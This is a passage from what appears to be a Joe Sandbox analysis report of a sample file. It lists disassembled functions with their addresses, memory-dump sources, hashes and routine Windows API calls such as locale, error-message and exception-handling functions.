                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: 3fa0c49da20ab38c1a413944a58e179e8a511161aca139726d36ab1fdeeb26c7
                                                                                              • Instruction ID: 2d08391290ef47166d86daef8bf0a0dff5510a551afc13fc1448e486eff6a0fe
                                                                                              • Opcode Fuzzy Hash: 3fa0c49da20ab38c1a413944a58e179e8a511161aca139726d36ab1fdeeb26c7
                                                                                              • Instruction Fuzzy Hash: 0031B274D116189BCB21DF68D989B89BBB8BF48311F5042DAE90CA7251E7709BC58F44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4E600 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
                                                                                              • Instruction ID: 30add4fd59ef5df6212bf56ac3d21e76b81238be50473bec9450b50eb0ad7848
                                                                                              • Opcode Fuzzy Hash: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
                                                                                              • Instruction Fuzzy Hash: E9022B75E002199FDF14CFA9C8806ADFBF1FF88324F25816AD919E7385D731AA418B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3C093 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A3C0B9
                                                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00A6072C,?,?), ref: 00A3C108
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                              • String ID:
                                                                                              • API String ID: 2169056816-0
                                                                                              • Opcode ID: 5bcaca4f340a27315289c114546c8db8554525e13d208e882763155d72a9493b
                                                                                              • Instruction ID: 3d23f4739b777a251b9215c455d30fc3f88e107489475b72b4d60f890650568d
                                                                                              • Opcode Fuzzy Hash: 5bcaca4f340a27315289c114546c8db8554525e13d208e882763155d72a9493b
                                                                                              • Instruction Fuzzy Hash: 24015A75140308BAD710DBE5EC45F9B77BCFF19715F009422FA04A7190E370A956CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A27727 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00A27886,?,00000400), ref: 00A27727
                                                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00A27748
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatLastMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3479602957-0
                                                                                              • Opcode ID: 5708e9b08af272384d495e2d2ec49ecfb2f63406a550f218db05cd691d4a4692
                                                                                              • Instruction ID: e701e42dc198d79b024537fb9a426a5b383473160943f0bb938470a1cc0105ee
                                                                                              • Opcode Fuzzy Hash: 5708e9b08af272384d495e2d2ec49ecfb2f63406a550f218db05cd691d4a4692
                                                                                              • Instruction Fuzzy Hash: D7D0A731348300BBF6100B706C06F1F3B597B04B42F20C0147709D40E0D6749051A714
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A52BB4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A52BAF,?,?,00000008,?,?,00A5284F,00000000), ref: 00A52DE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: 10aace02d79ae6b9dbff5dcc281427f332ef2e7b8752bf26bacb5aed9edcf29d
                                                                                              • Instruction ID: 58071f283f7344e4c8dff09da2ed76f510138994c38bc5c8c94e89a1e233bc47
                                                                                              • Opcode Fuzzy Hash: 10aace02d79ae6b9dbff5dcc281427f332ef2e7b8752bf26bacb5aed9edcf29d
                                                                                              • Instruction Fuzzy Hash: 43B11D326106099FD715CF28C486B657BF0FF46366F258658EC99CF2A1C335E995CB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A40826 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00A4083C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              • Opcode ID: 4da96f101b1b4e925af7d276d87e112110c54a1001aaa4ca280abb470bfadf76
                                                                                              • Instruction ID: 91530ebc4c9b4ed9dcbbc23097e63f342066683b865a91ff572b969a4b35c0b3
                                                                                              • Opcode Fuzzy Hash: 4da96f101b1b4e925af7d276d87e112110c54a1001aaa4ca280abb470bfadf76
                                                                                              • Instruction Fuzzy Hash: F3519EB6A01605CFEB14CFA8D981BAEBBF0FB88304F24856AC511EB261D3749941DF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2C365 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00A2C388
                                                                                                • Part of subcall function 00A2C3F7: __EH_prolog.LIBCMT ref: 00A2C3FC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prologVersion
                                                                                              • String ID:
                                                                                              • API String ID: 1836448879-0
                                                                                              • Opcode ID: 6ef6c89ce3d2eb42efdde5ca72220397e15eb0d1ae0d763df93a94667dcf16fc
                                                                                              • Instruction ID: c1f9a2d06807dfc0bf491333df9efc5d5461df7c0fcb69222141e0c7e5a614e2
                                                                                              • Opcode Fuzzy Hash: 6ef6c89ce3d2eb42efdde5ca72220397e15eb0d1ae0d763df93a94667dcf16fc
                                                                                              • Instruction Fuzzy Hash: 03F082309042A88ADF25DB68B80A3DCBBF55B11729F0488E5C1805A192C2F586CBDF72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A24A8E Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: gj
                                                                                              • API String ID: 0-4203073231
                                                                                              • Opcode ID: 8b458404b25e1c33caffb322e86de50759b32c8e1d057f5151f8d609f2e0b862
                                                                                              • Instruction ID: 95d33896779235b3065ad2e64dbea2227a1bb8ae175577e1261a7584cc0b496d
                                                                                              • Opcode Fuzzy Hash: 8b458404b25e1c33caffb322e86de50759b32c8e1d057f5151f8d609f2e0b862
                                                                                              • Instruction Fuzzy Hash: 08C137B2A183818FD754CF29D88065AFBE1BFCD208F19892DE998D7301D734A945CB96
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A40B9D Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00020BB0,00A40605), ref: 00A40BA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 8ddddd8faf264743b37d0d418df8722897d1fe0c9e37250081b34b88193d8ff4
                                                                                              • Instruction ID: 9dfd23c5dd7609ff6bf66eaae4c196ff1232bd4ccb216aa1b7c94f3a6f5da254
                                                                                              • Opcode Fuzzy Hash: 8ddddd8faf264743b37d0d418df8722897d1fe0c9e37250081b34b88193d8ff4
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4D1F0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              • Opcode ID: ab79867a7da1e983a88ef4745cc1c75d7c51f8252e1971a95b318ebdc82ce8f0
                                                                                              • Instruction ID: c11a4963f740164bcf49be394f667bc5d2a3a8a029d99684879e9abf9c5b9e72
                                                                                              • Opcode Fuzzy Hash: ab79867a7da1e983a88ef4745cc1c75d7c51f8252e1971a95b318ebdc82ce8f0
                                                                                              • Instruction Fuzzy Hash: ECA011B0202202CB8300CFB2AA082083AA8BA0A2823008028A088C0220FB2080A28B02
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3742E Relevance: .8, Instructions: 807COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 49c86cf5dfd120552ca6a330adbc3208c23189e3a77a00f43a99fa3c4c682a92
                                                                                              • Instruction ID: 489eef7311c5ee815f852d95eb6f1fc782afc3cdb34fefe77fb9d2409a315a97
                                                                                              • Opcode Fuzzy Hash: 49c86cf5dfd120552ca6a330adbc3208c23189e3a77a00f43a99fa3c4c682a92
                                                                                              • Instruction Fuzzy Hash: 9662D6B1608B859FCB39CF38C5906BDBBE1AF95304F18856DF99A8B342D734A945CB10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A388AF Relevance: .8, Instructions: 781COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a99e5591819f93bed0ea4b7cda3a5de53e9357d52e2d772d63c253c1e4b53f2a
                                                                                              • Instruction ID: 240da152286176a960452a53cf2a56d6723aec17224b7ef2e55da9fe895b9075
                                                                                              • Opcode Fuzzy Hash: a99e5591819f93bed0ea4b7cda3a5de53e9357d52e2d772d63c253c1e4b53f2a
                                                                                              • Instruction Fuzzy Hash: 3B62E371A083459FCB18CF28C5906B9BBE1BF95304F18866DFC998B346DB38E945CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A307A7 Relevance: .7, Instructions: 694COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dfbf6881d0393643dd25d5cfa1cce131a79b466a846340052269a16c1008f441
                                                                                              • Instruction ID: 7f6fd0d863ec4daf2875b2a854f1d824d9ed2fd14565c9489c710de8697eb920
                                                                                              • Opcode Fuzzy Hash: dfbf6881d0393643dd25d5cfa1cce131a79b466a846340052269a16c1008f441
                                                                                              • Instruction Fuzzy Hash: 19524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A38253 Relevance: .5, Instructions: 528COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f787c4ce50420d944c97ccf420451591fb7dea7718ebf0059b484a6d7d441889
                                                                                              • Instruction ID: 3b59df67d61f358fa44330edd0fecb38e2fb9fa561006eaaf8652c21e597e31b
                                                                                              • Opcode Fuzzy Hash: f787c4ce50420d944c97ccf420451591fb7dea7718ebf0059b484a6d7d441889
                                                                                              • Instruction Fuzzy Hash: 3512D1B16047468FC728CF28C9917B9B7E1FB44304F14892EF99BC7680EB78A995CB45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2D833 Relevance: .5, Instructions: 454COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1e8dadc7f591174714af29e43b2b1c22fa64176d11ce3ea3ff4f7026e8c90858
                                                                                              • Instruction ID: f2fd0c43188a71b05e20b521255e8cfc05154874ede630b57469e3ddaf551a89
                                                                                              • Opcode Fuzzy Hash: 1e8dadc7f591174714af29e43b2b1c22fa64176d11ce3ea3ff4f7026e8c90858
                                                                                              • Instruction Fuzzy Hash: 83F1A7716093618FC718CF2CE584A2ABBE5EFC9364F144A2EE4C5DB252D631E946CB42
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A37DDC Relevance: .3, Instructions: 343COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: f699d9907af1ca96ce3de7e22743596b8bfb97c07d7e08e0a29c7cd9df5e5d03
                                                                                              • Instruction ID: 7e27899b765378e86195245ee1d9ea0ee4b53cc330402eec18a38b693a4e126e
                                                                                              • Opcode Fuzzy Hash: f699d9907af1ca96ce3de7e22743596b8bfb97c07d7e08e0a29c7cd9df5e5d03
                                                                                              • Instruction Fuzzy Hash: 55D194B1A083418FDB24DF28C98475BBBE1BF89308F04466DF8899B242D774E945CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2FCCC Relevance: .3, Instructions: 320COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
